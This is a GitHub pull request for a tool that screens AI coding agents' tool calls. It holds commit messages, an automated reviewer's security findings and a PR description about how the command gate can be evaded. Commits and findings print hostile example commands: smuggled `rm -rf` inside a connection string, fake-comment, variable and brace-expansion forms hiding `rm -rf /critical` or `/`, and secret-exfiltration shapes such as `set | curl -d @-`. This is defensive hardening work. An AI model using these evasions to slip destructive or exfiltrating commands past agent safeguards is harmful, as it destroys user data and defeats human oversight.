A LONG PROMPT NO LONGER DECIDES ANYTHING. `truncated` — an over-long
human turn, agent message, or one T4's store had already capped — is
recorded and read no further. It used to withdraw every clear, so the
same call came out `allow` after a 77-character prompt and `deny` after
a 3,000-character one; the store keeps a capped prompt for hours, so the
clearing half of the tier stayed off for the rest of the session. The
channel guarantees are unchanged: consent is checked locally against the
UNCUT human turn and against the SENT agent message.
What withdraws clears is now `requestCut` alone: a cut inside
`agent_request`, or inside the deterministic `facts` the probes are told
to read and to trust.
THE BYTE BUDGET IS A REAL BOUND. Every value is charged what
serialization actually costs — an empty string its two quotes, an array
element its separator on top of its own floor, an object entry its
quoted key, colon and comma, a number its real digits. `""` was charged
nothing and serializes as three characters inside an array, so 36,000 of
them put the state 21% past `MAX_STATE_CHARS` with both flags false,
which re-opened the fail-open. No entry-count cap: that would fire on
ordinary MultiEdits and MCP bodies. `envelope-budget.test.ts` now drives
the COST MODEL — for each leaf type, grow a container past the budget
and assert the serialized size still fits — instead of enumerating
payload shapes, which is what missed this.
REDACTION THAT REMOVES SOMETHING EXECUTABLE IS A CUT.
`CONNECTION_STRING_RE`'s userinfo run is `[^@\s]+`, and `${IFS}` spells
a whole command without a space, so `redis://$(rm${IFS}-rf${IFS}/srv)@h`
was swallowed whole with both flags false. It is still redacted — a
password is not worth leaking to win an argument about whether it was
one — and the removal now sets `requestCut`. A bare `$VAR` does not
count, because `postgres://$DB_USER:$DB_PASS@host` is how people write a
connection string.
THE INJECTION PROBE IS ASKED ON EVERY CALL, including one with no
recorded human message. Gating it on `user_said` switched the ESCALATION
half off exactly where the ground is weakest — the first call of a
session, and every call on a CLI with no prompt event (Hermes has none)
— and switched the clearing half off entirely for those users. The task
probes stay gated: with nothing the human typed, there is nothing for
"did they ask for this?" to be about.
AND THE SAME REGRESSION THROUGH THE STORE'S CAP, which no flag could
fix. `targetNamedByUser` is a LOCAL substring check over what T4's store
KEPT, so at 1,200 characters an ordinary pasted spec no longer contained
the thing it asked for: "delete cache.sqlite" cleared the policy,
"delete cache.sqlite" with a page of context around it did not, and Jev
turned an explicit request into an instruct. `MAX_USER_MESSAGE_CHARS`
(which `intent.ts` imports, so it is the store's cap too) goes to 6,000
— a stack trace and a moderate spec — and `facts` are now built BEFORE
the messages, so a long prompt cannot starve them and take the clears
away by that route instead. Measured: the threshold moves from ~1,200 to
~6,000 characters of prompt; past that it is a recorded gap.
Also: the shell-comment quarantine is charged to the CALL's budget and
cut as the call (it was 600 characters against the CONTEXT budget, so a
heredoc whose body lines start with `#` lost 97% of its text with
`requestCut` false), and it is built last so the command always gets the
budget first.
Kept: the hard budget, keys capped and redacted like values,
serialization that never throws, no catastrophic backtracking, and
byte-identical behaviour with no jev.json.
`bunx tsc --noEmit -p .` clean, `bun run lint` 0 errors, full suite
5,706 passed / 10 skipped. Worst measured `prepareSemantic` 23-37 ms on
a 2.4 MB 200,000-key payload (21 ms of it `Object.entries`); a 500 KB
command is 0.9-2.2 ms and an ordinary call 0.06-0.29 ms. Worst-case
compiled request 101,576 characters, 18,424 under `MAX_REQUEST_CHARS`.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…i on add parseList and parseCliList used findIndex, so they read the first occurrence of a flag and dropped the rest; packAddSource already skipped every repeat's value, so nothing was misread as the source and nothing warned. `--policy a --policy b` enabled a alone, and `--only` beside `--policy` was never looked at. Both parsers now walk every occurrence and return the union, and an occurrence with no value is still refused as before. Co-Authored-By: Claude Opus 5.5 (1M context) <noreply@anthropic.com>
…olls reqwest's Display for a transport error is "error sending request for url (...)" whatever went wrong; the cause is in source(). The uploader and the cloud policy client logged only the top, so the private-CA failure read exactly like an outage and the reporter could not tell it was TLS. The certificate verdict (`invalid peer certificate: UnknownIssuer`) was three sources down. Add fpai_collect::error_chain and use it where a reqwest error is logged: the upload network error, the desired-state and artifact requests, and both client builders (with native roots a builder can now fail on an unreadable system store, and its Display is just "builder error"). Tests: the private-CA control case now asserts the detail names UnknownIssuer, and a desired-state poll to a closed port must say "Connection refused". Both failed before this change. Co-Authored-By: Claude Opus 5.5 (1M context) <noreply@anthropic.com>
…rked ones pendingBatches scanned only subdirectories of state/spool. The daemon writes every batch flat into state/spool (own_spool_dir) and the SDKs into custom-agents/events, so the count was 0 on every machine: `flush` never wrote a request, `--wait` returned at once, and it printed "Nothing spooled, everything already delivered" with batches on disk. The unit tests built a state/spool/<source>/ layout the daemon never produces, which is why they passed. Count the flat roots the daemon sweeps. Batches parked in state/failed are counted separately and named, not called delivered; flush does not resend them (the daemon retries parked batches about hourly and at start, and making flush retry them would let three flushes during an outage poison them), so the line says how they are retried. Co-Authored-By: Claude Opus 5.5 (1M context) <noreply@anthropic.com>
targetTokens lexed the command with facts.ts scanCommand, which ends its
view at a '#' bash does not treat as a comment ($'...', ${x:- # },
backticks). For `echo $'\' # '; rm -rf ~/work/other-repo` it returned no
targets, and both deciders read an empty set as "names no target", so an
op-requested override rested on Jev's answers alone: offline, with identical
answers, the plain rm came out deny and the fake-comment rm allow.
When the scan finds nothing, targetTokens now takes the words of the raw
command (first word of each piece and flags skipped, as the scan does).
That can only be stricter: an empty set already passed. When the scan does
find targets, comment text still cannot supply one. A command that really
names nothing (`git push --force --all`) still yields an empty set and rides
on the scope answer as before. Pinned for v1 and v0 with the three fake
comment shapes plus the plain command and that control.
Co-Authored-By: Claude Opus 5.5 (1M context) <noreply@anthropic.com>
hermes-exosphere
left a comment
There was a problem hiding this comment.
Hermes found blocking issues that should be addressed.
Review coverage was incomplete, but the concrete blocking findings below are sufficient to request changes.
High: Partial target scan can clear a deny for a different target
- Rule:
SEC-001 - Location:
src/hooks/semantic/decide.ts:91 - Evidence:
targetTokens()falls back to raw command words only when the partial scanner produced no target (lines 86-97). The scanner does not understand an escaped quote in ANSI-C quoting and treats the following#as a comment (facts.ts:84-115). Consequently, forecho $'harmless\\' # ignored'; rm -rf /critical, the containerized reproduction returned["harmless"];/criticalis never considered. With a reviewable destructive-deletion policy and otherwise qualifying Jev answers,decideV1()returnedallowfor the user messageremove harmless, because lines 324-353 accept any matching scanned target. This bypasses the local check intended to ensure that an override names the actual destructive target. - Required change: Make target extraction fail closed whenever scanning may be incomplete, rather than only when it is empty. Have the scanner report truncation/unsupported shell syntax and prohibit intent overrides for that command (or use a shell-aware parser that reliably identifies every command target). Add regressions where a harmless pre-comment token precedes each fake-comment form and a destructive target follows it.
…oot in the survey 137ddf4 deduplicated custom policy files by resolved path, but resolved a configured path against the process cwd while the loader resolves it against the project root. A relative path naming a convention file was then counted twice whenever jev status or the dashboard ran from another directory, so the "each file once" the CHANGELOG promises did not hold. Co-Authored-By: Claude Opus 5.5 (1M context) <noreply@anthropic.com>
…he hook path 35c5207 recorded which pack a deciding Jev check came from by `await import("./semantic/pack-policies")` in handler.ts. That only ran when Jev had decided, but it broke the boundary this PR pins in pack-semantic-import-boundary.test.ts ("the pack->policy resolver is loaded by the semantic evaluator and the publish command, and nothing else"), so that test failed at the branch head. The evaluator already resolved the checks it asked, with their origin. Each PolicyOutcome now carries its check's `origin`, the answered JevReview names the deciding check's, and the two-tier result hands it to the handler as `jevOrigin`. The activity row is unchanged (the two-tier-handler provenance test still passes); handler.ts no longer references pack-policies. Co-Authored-By: Claude Opus 5.5 (1M context) <noreply@anthropic.com>
…ge version The test asserted packageVersion < 1.0.7, true only while the branch sat on the 1.0.7 prerelease line. Merging main moved it to 1.0.8-beta.0 and the assertion failed. What it means to pin is that a prerelease does not satisfy a minimum of its own release, so compare the version against its own release instead of a hard-coded one. Co-Authored-By: Claude Opus 5.5 (1M context) <noreply@anthropic.com>
hermes-exosphere
left a comment
There was a problem hiding this comment.
Hermes found blocking issues that should be addressed.
Review coverage was incomplete, but the concrete blocking findings below are sufficient to request changes.
High: Partial target scan can clear a deny for a different target
- Rule:
SEC-001 - Location:
src/hooks/semantic/decide.ts:91 - Evidence:
targetTokens()falls back to raw command words only whenscanCommand()yielded no tokens (src/hooks/semantic/decide.ts:91). If the scanner stops at a#it incorrectly treats as a comment after already seeing an innocuous token, the fallback is skipped. In an isolated reproduction,echo $'harmless\\' # ignored'; rm -rf /criticalproduced targets["harmless"]; with destructive-deletion evidence, qualifying op-requested answers, and the user messageremove harmless,decideV1()returnedallow. The target gate accepts any one matching target at src/hooks/semantic/decide.ts:330, so the unscanned/criticalcan be cleared despite not being requested. - Required change: Make target extraction fail closed whenever shell scanning may be incomplete, not only when its result is empty. Propagate an incomplete/unsupported-syntax signal from the scanner and prohibit intent overrides for that call, or replace it with parsing that reliably identifies every target. Add regressions with an innocent pre-comment target and a destructive target after each fake-comment form.
…ry target must be named
targetTokens fell back to the raw command only when scanCommand found no
target at all. In `echo $'harmless\' # ignored'; rm -rf /critical` the scan
saw `harmless`, stopped at a `#` bash does not treat as a comment, and the
target gate accepted any one named target, so after "remove harmless" an
op-requested override cleared the rm (SEC-001, review 5328229094).
scanCommand now reports `complete: false` on every construct it does not
follow: $'...' and $"...", ${...}, $(...), backticks, <(...) and >(...),
heredocs and here-strings, backslash-newline, an unclosed quote, eval or a
shell's -c string, and a command past MAX_SCAN_CHARS. On such a command
neither intent route (op-requested or task-step) clears or softens a policy
in decide or decideV1, and userSaidCut does not rescue it; Jev's own deny or
instruct still stands. The outcome records targetScanIncomplete.
The gate also needs EVERY target named now, not any one: each non-flag
shell argument is its own target, so `rm -rf build/ ~/important` after
"clean the build" is not cleared while `rm -rf build/` still is. A non-shell
tool's argument values stay one target. The scan stays one linear pass.
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
…argets the user named
A task-step answer softened a fired deny to a warning (or cleared a warning)
without reading the call's targets, and combine.ts counts that warning as a
clear of a reviewable regex deny. So `rm -rf build/ ~/important` after
"clean the build", with task_step 0.9, still dropped the regex deny: the
same class as SEC-001, one route over.
On a shell command the task-step route now does not apply when the human's
words (or, in v1, the agent proposal they replied to) name some of the
call's targets but not all of them. A goal that names no target keeps the
goal-based softening ("fix the failing tests" then `rm -rf node_modules`),
`rm -rf build/` after "clean the build" is still softened, and a cut human
turn stays inconclusive. The incomplete-scan withhold still covers both
routes. A non-shell tool's task-step route is unchanged.
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
|
@hermes-exosphere reconsider SEC-001 (partial target scan) is addressed in a14378a + 0adc921:
|
…e command keeps the floor Matches FailproofAI/failproofai#833 at 0adc9212. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_016UhTaConsTkbuxm14w6fye
hermes-exosphere
left a comment
There was a problem hiding this comment.
Hermes found blocking issues that should be addressed.
Review coverage was incomplete, but the concrete blocking findings below are sufficient to request changes.
High: Simple variable expansion bypasses the semantic clear target gate
- Rule:
SEC-001 - Location:
src/hooks/semantic/facts.ts:141 - Evidence:
scanCommand()marks$'...',${...}, and$(...)incomplete, but not ordinary$NAMEexpansion (src/hooks/semantic/facts.ts:139-146). ConsequentlyDANGER=/critical; rm -rf $DANGERis reported complete anddecideV1()returns allow for user textremove dangerwith otherwise qualifying answers;decide()does the same. The existing regex floor intentionally treats an unresolved$DANGERdelete target as catastrophic, andblock-rm-rfis reviewable bydestructive-deletion(src/hooks/policy-catalog.ts:209-220), so its deny is then cleared by the answered-review combination. The isolated container reproduction confirmed both intent paths allow and that the reviewableblock-rm-rfverdict combines to final allow. - Required change: Treat unresolvable simple parameter expansion (including
$NAME, positional/special parameters, and arithmetic expansion) as an incomplete shell scan, unless it is fully resolved locally. This must prevent both op-requested clears and task-step softening. Add regressions for an in-command assignment and inherited environment variable that expand to an unrequested catastrophic path.
Round 4 of 5. If the next review still finds something blocking, I will summarize what is left, withdraw this change request, and stop reviewing this pull request until someone asks me to start again.
Still open:
- F9 Simple variable expansion bypasses the semantic clear target gate (
src/hooks/semantic/facts.ts) — open since round 4
If one of these is not worth fixing, @hermes-exosphere dismiss <id> [reason] waives it for the rest of this pull request and gives the review another round.
scanCommand marked `$'...'`, `${...}` and `$(...)` incomplete but not a
plain `$NAME`. So `DANGER=/critical; rm -rf $DANGER` scanned complete with
the one target "danger", and after "remove danger" both deciders cleared
the rm on the variable's NAME, dropping block-rm-rf (F9, SEC-001).
Any `$` that starts an expansion outside single quotes now makes the scan
incomplete: `$NAME`, `$1`..`$9`, `$0`, `$@ $* $# $? $$ $! $-`, `${...}`,
`$(...)` and `$((...))`, bare or inside double quotes. Nothing is resolved
locally. A `$` inside single quotes, a backslash-escaped `\$`, and a `$`
before anything else stay literal. The existing withhold then stops both
the op-requested clear and the task-step softening.
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
|
@hermes-exosphere reconsider F9 (simple variable expansion) is fixed in 50ccd94. Any |
|
I have spent 5 rounds of review on this pull request and I am still finding things to block on. At that point I am no longer the useful reviewer here, so I am standing down and leaving the decision to a person. I have withdrawn my change request, so I am no longer blocking this pull request. I have also stopped reviewing new commits on it. What I last reviewed: Still open:
None of this is a judgement that the findings above are wrong. It is a judgement that another round of me is not what will settle them. |
Hermes spent 5 rounds on this pull request without converging and has stood down. This change request is stale and should not block the merge.
scanCommand read `rm -rf {build,/critical}` as one word, whose target
words were build and critical, so "clean the build" named that target and
the rm of /critical was cleared. A glob is the same: `rm -rf /crit*`
deletes whatever matches, not the word "crit" the human said.
Unquoted brace expansion inside a word (a `{` with a `,` or `..` before
its `}`) and unquoted globs (`*`, `?`, a `[` closed by `]` in the same
word) now make the scan incomplete, so neither intent route clears or
softens. A lone `{` or `}` word (`{ ls; }`, `-exec rm {} \;`), `{}`,
anything in single or double quotes, and backslash-escaped characters stay
complete. State is per word and constant per character.
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
The final live regression in enforce mode allowed two calls the regex tier denies: an unrequested Read of /etc/shadow (secret-exposure 0.69, read-outside-workspace 0.37 — that probe models home-directory paths only) and `set | curl -d @-` after "follow SETUP.md" (env-secrets-dump 0.66, credential-exfiltration 0.65). Nothing fired, so the reviewers counted as "no concern" and the reviewable deny was cleared. Closing it means either narrower hard shapes or recalibrating the fire line on the labelled corpus; that is deferred, so authority.mdx now says so where authors choose reviewable, and tells them to keep a policy hard when one of these shapes getting through matters more than its false blocks. Co-Authored-By: Claude Opus 5.5 (1M context) <noreply@anthropic.com>
The machine key in ~/.failproofai/credentials.json now carries jev:evaluate, so it spends the organization's Jev allowance from wherever it is used. The file is owner-only, but the agent runs as its owner, and reading failproofai's files is allowed by design (only changing them is blocked): the reviewable block-read-outside-cwd is all that stands in the way, and from a session started in $HOME nothing does. Kept as designed; the page now says so and tells operators to disable and replace a key an agent may have read. Co-Authored-By: Claude Opus 5.5 (1M context) <noreply@anthropic.com>
A two-tier hook evaluator: the regex policies stay a hard floor, and Jev — TypeSafe's non-autoregressive classifier — can clear policies explicitly marked reviewable, or add a deny or a warning of its own.
It is off unless the customer configures their own endpoint and key. With no
~/.failproofai/jev.json, the hook path is what it was before this branch, pinned by a golden that compares 2,088 cases — decision, reason, policy names, stdout, exit code, persisted activity rows and key order — against a recording made before the evaluation path changed. That golden passes byte-for-byte. One deliberate exception is described under "What changes for users who never configure Jev".What it does, measured
All 1,332 labelled cases through the real handler. The live run is one Cloudflare pass whose per-case answers were recorded; later variants are replayed against that recording, which reproduced the live run 1332/1332 on the rule it was recorded under.
Three things had to be fixed before those numbers were reachable, and each was found by measurement rather than review:
noneoroverridden, so a warning-level answer left a hard block standing. It now clears unless a named check answersdeny— every one of the 54 cases that moved went deny → warning, and none went deny → allow.block-read-outside-cwddenies any path outside cwd, but its paired checkread-outside-workspaceonly fired for paths under$HOME, so for/tmppaths the question was never asked and "Jev may only clear what it was asked" made the block permanent. Jev said allow on 103 of those 106 cases.//comment in a heredoc as the path/and consumedcdtargets without recording them, so the reviewer still was not asked on 16% of that policy's denials. Fixing both moved paired coverage from 83.5% to 92.7% and removed 12 more false blocks at a cost of one attack — an.envexfiltration that goes from deny to warning, and which the regex tier still denies outright throughblock-env-files.The research's 2.3% was never comparable. The offline model had no pairing at all: it discarded the regex verdict and used Jev's whole answer. The plan's targets came from that model.
The clear rule
A reviewable policy's verdict is cleared only when every check named in its
reviewedBywas actually asked and none answereddeny. A check that was never asked always keeps the verdict standing. Clearing on a warning silences nothing: the same answer makes Jev's own decision an instruct, so the call comes out as Jev's warning instead of the regex policy's block.Injection withdraws every clear. A request Jev was only shown part of clears nothing. A hard policy is never clearable, and
block-failproofai-commandsisalwaysOnand hard by construction.Authority
Every policy carries
authority(hard|reviewable) andreviewedBy, flowing from the builtin catalog, pack manifests, cloud artifacts and custom hooks into the registry. Absent, invalid, an emptyreviewedBy, oralwaysOnall resolve to hard, so an unknown custom, pack or third-party policy can never be weakened.Seven builtins are reviewable:
block-read-outside-cwd,protect-env-vars,block-env-files(the three measured as noisiest), plusblock-work-on-main,warn-git-amend,warn-destructive-sqlandwarn-global-package-install. All 38 pack policies were examined for further pairings; every candidate was refused with a measured reason.What changes for users who never configure Jev
Almost nothing, and the exception is a bug fix rather than the evaluator.
extractAbsolutePathsno longer reads a bare//as the root, and no longer starts a match on the second slash of://. So a heredoc containing a// comment, or a command containinghttp://host/path, stops looking like a read outside the project. On the labelled corpus that turns 10 denials into allows, all 10 labelled safe.//etc/passwd, a lone/,ls /**and genuine absolute paths inside heredocs still match.Also in here
~/.failproofai/jev.json, global scope only, 0600, refused if the file or its directory is group/world-writable. Five providers: TypeSafe direct, OpenRouter, Vercel AI Gateway, Cloudflare Workers AI, custom URL.failproofai jev—setup/status/test/remove, plus the one-shotfailproofai jev --url <url> --token <token>with the provider inferred from the host.--key-stdinstays the documented recommendation;--tokenwarns that a command line lands in shell history and the process list.jev statusand the panel say so (0 of 11 enabled policies are reviewable…) and name the fix. A pack published before this release declares no authority, so without this the clear half simply never works and nothing says why.sk-form,sk-ant-/sk-proj-, Vercelvck_,AuthorizationandProxy-Authorizationvalues, credential flags, private key bodies. Gate: 1,332 replayed requests plus 22 runtime-built fixtures, zero secrets in any request body.Fixes worth naming
PreToolUsehook for 27.8 seconds. Now flat in field count.Upgrade path
Verified in containers against a real published 1.0.6 install, on three machine shapes (pack-installed, no-pack, custom policy file):
npm i -g failproofai && failproofai updateis the whole upgrade.PROTOCOL_VERSIONandLAYOUT_VERSIONare unchanged, so the fail-closed protocol-mismatch path never fires and there is no deny-everything window. Enabled policies, custom policy paths and every agent's hooks config come through byte-identical; decisions match character-for-character across 13 hook events; 1.0.6-written activity rows still read.Known gaps
reads_outsideprobe's wording still describes only home-directory paths, while its precondition now covers system and root paths too. Asked about a system path with home-path wording, Jev can answer low and clear the policy. The fix is a wording change to a calibrated classifier input, so it needs a corpus replay to validate and is deliberately not bundled here.@/aliasshares the shape ofcurl -d @/etc/passwd;/**really does read root) or needs heredoc-body parsing.block-kubectlis the clearest case where a different customer's traffic would change the answer.Policies ship as a pack, including Jev's
Added to this PR rather than a follow-up, because the beta has to carry all of it at once: a pack published against a CLI that lacks this feature installs cleanly and silently drops its entire Jev half.
Until now the 16 semantic policies were a compiled-in constant, and a pack manifest had fields only for a regex-style policy. So the clear half of the two-tier design only worked for policies shipping inside the binary, and on a pack-installed machine Jev could only ever add denies. That is the "a pack published before this release marks nothing reviewable" gap under Known gaps — closed rather than documented.
A pack can now declare Jev's questions.
semanticPolicies.add({...})is public API besidecustomPolicies.add, a manifest carries asemanticarray, andpublishemits it from the entry's registrations the way it already emits the regex catalog. A separate namespace, because a semantic policy has nofnand nomatchand never executes locally — putting it behind the object whose other method returnsallow()/deny()invites exactly the shape confusion the parser then has to catch.A precondition is a name, never code
Two of the 16 gate their questions on a deterministic fact. A manifest cannot carry a function, and a downloaded artifact that gates every tool call does not get to carry an expression this process evaluates. So
preconditionis a name from a closed registry, split in two: the names are a string list with zero imports, because the parser runs on every hook event and8b9ca9acin this PR exists to stop the semantic modules loading on a machine that never configured Jev. The predicates live on the Jev side.pack-semantic-import-boundary.test.tswalks the transitive graph from the parser, the registry and the reviewer resolver and pins that none of them reaches a Jev runtime module — the guarantee is now enforced instead of remembered.An unknown name drops that one policy and records why. Dropping is the safe direction: a semantic policy is what clears a reviewable verdict, so losing one leaves the regex block standing — noisier, never weaker.
The pack replaces the compiled set, and that is what makes
reviewedByworkA pack declaring at least one semantic entry replaces
SEMANTIC_POLICIESwholesale, mirroring the rule already in force for regex builtins. One source of truth, so a name cannot mean two question sets.resolvePolicyAuthoritynow judgesreviewedByagainst the effective reviewer set — the pack's own semantic names when a pack declares any, else the written-out builtin list. This is the load-bearing part: without it a pack policy naming its own pack's check resolves tohardfor naming "a check this build does not have", and every authority mark in the pack is inert while looking correct.surveyReviewableCoverage()counts against the same set, or its diagnostic lies on exactly the machines this is for.minCliVersion
An older CLI ignores both new fields silently. So a manifest can state a minimum, and an older CLI refuses the pack through the existing
PackErrorpath — which already carrieseffectandclison a failure so anobservepack that fails to load does not make the machine deny. Refused at add time as well as at read: refusing at add is a message someone can act on, refusing at read is a machine that denies every tool call until somebody works out why.daemonVersionSkew()only does string equality, so the comparison is a new module with real semver precedence —1.0.6<1.0.7-beta.0<1.0.7-beta.1<1.0.7<1.0.8. A split-on-dots implementation makes the beta satisfy a1.0.7minimum, which is backwards in the one direction that matters. Absent and malformed are deliberately not the same value: absent must satisfy, because every pack published before this release has no minimum; malformed is ignored and recorded, because a publisher's typo in a version string must not deny every tool call on a stranger's machine.Caps come from the envelope, not from a guess
Per-policy caps (≤ 24 policies, ≤ 6 probes) are a cheap early guard. The cap that binds is on total compiled question characters, derived from
MAX_REQUEST_CHARS - MAX_STATE_CHARS, because a written-down number drifts from the envelope. The first draft capped counts instead, and what it allowed — 24 policies at 80 probes, at the measured 496 characters per probe — compiles to 54,008 characters, which with full state is 215,032 against a 192,000 budget. A pack that installs cleanly and can never be sent, and it would have quietly turnedPreparedCall.oversizedfrom "our own questions overran" into nothing. The real 16 use 19,787 worst case.Fixes this turned up
policies addfetched a pack's Jev half, verified it, and dropped it. Every test passed because they install by writing the record directly; a real install wrote neithersemanticnorminCliVersionintoinstalled.json. Green suite, inert product.publishdropped every policy'sparamsschema. Registration reads a pack policy's parameter schema from the manifest, so a missing schema meansctx.params = {}and discards the user's own configured values too. 19 of 38 carry params: published that wayprefer-package-manageris permanently inert andblock-sudo'sallowPatternsandblock-read-outside-cwd'sallowPathsstop working — every one failing silently stricter, the direction nobody reports as a bug.--min-cli-versionwas parsed, validated, and never written to the manifest.publishhandsbuildan assembled argument list, so every flag must be forwarded by name. Invisible from both sides: the command refused an uncomparable value exactly as documented, andbuild's own tests pass because they callbuilddirectly. Found by building the real artifact and asserting on the manifest instead of on an exit code.A semantic-only pack drew an empty picker and an install summary reading "none — the pack is installed and enforcing nothing", for a pack enforcing entirely through the Jev tier. The preview, picker, summary and dashboard now count them, and call them Jev checks rather than policies — nothing switches them on or off,
--policycannot name one, and they are in no policies listing.block-work-on-mainwas reviewable by a check that can only clear it.commit-on-protected-branchcovers exactly its concern but is instruct-mode, and an instruct-mode check can never answer deny — so the conjunction had one reachable outcome. The mark did not hand the decision to Jev: it switched the policy off on every Jev-configured machine while the authority table, the manifest andjev statusall reported it as reviewed.The test is not "can the named reviewer keep this block" but "is there anything left that can deny".
block-read-outside-cwdalso names only an instruct-mode reviewer and correctly stays reviewable: when it clears,secret-exposureandcredential-exfiltrationare still asked about the same read and still deny on their own through the most-severe merge, so Jev replaces the regex judgment rather than surrendering it. Here nothing else covers committing on a protected branch. The other five reviewable builtins were checked against the same test; this was the only one. Six builtins are reviewable, not seven.Both ways of pairing a policy wrongly are silent, and the asymmetry was written down nowhere.
authority.mdxnow states it: a check that is never asked makes the block permanent; a check that is asked and does not fire answers "no concern", which clears — so pairing with a check that does not model your policy's shapes does not review the policy, it switches it off for exactly the inputs that check does not understand.What changes for users who never configure Jev
Nothing. Both manifest fields are optional, so every pack published before this release parses unchanged, and no semantic module is imported when
~/.failproofai/jev.jsonis absent. The 2,088-case golden passes byte-for-byte.Testing
tscclean. Lint identical to main (5 warnings, 0 errors, same files and lines). Unit: 6,994 passed, with the only failures being twofp-resetdaemon-skew tests that fail identically onorigin/main. Build emits all four artifacts. E2E 333/333, same as main. The only pre-existing test files modified are count pins and two fixtures that pinned constants this branch deliberately changed.🤖 Generated with Claude Code
Hermes review
50ccd9430dfbf0ec2ae0429776c66a98f63020961d8f31d926828f3bae215c58f5b35baa44acbff0gpt-5.6-terraSummary
Found one high-severity semantic-clear bypass: brace expansion can add an unrequested destructive target while the target scanner treats it as a complete, user-named command.
Changes
Validation
Passeddocker run --rm --network=none -v /review/input/workspace:/workspace -w /workspace oven/bun:latest bun -e '<semantic brace-expansion repro>'— Confirmed the root-target brace form is marked complete, yields onlyharmlessas a target group, and returns allow in both decision engines; Bash expands it toharmlessand/. (2s)Passeddocker run --rm --network=none -v /review/input/workspace:/workspace -w /workspace oven/bun:latest bun -e '<scanner expansion cases>'— Confirmed the F9 change handles the documented ordinary and double-quoted parameter expansion cases. (1s)Skippeddocker run --rm --network=none -v /review/input/workspace:/workspace -w /workspace oven/bun:latest bunx vitest run __tests__/hooks/semantic/facts.test.ts __tests__/hooks/semantic/decide.test.ts --reporter=dot— The isolated container has no installed Vitest dependency and no-network isolation prevents fetching it; no centrally configured validation command was supplied. (17s)Findings
scanCommandonly marks selected shell constructs incomplete atsrc/hooks/semantic/facts.ts:148; unquoted brace expansion is not included. Consequentlyrm -rf --no-preserve-root {harmless,/}is marked complete andscanTargetsproduces only the groupharmless. With the user requestremove harmless, bothdecideanddecideV1returnallowfor a firingdestructive-deletionpolicy. Bash expands that argument intoharmlessand/, so the cleared command can recursively delete the filesystem root. (src/hooks/semantic/facts.ts:148)Open questions
None.
Policy overrides
None.
Summary by CodeRabbit
failproofai jevor dashboard settings with supported providers and enforce or shadow mode.cd.failproofai update.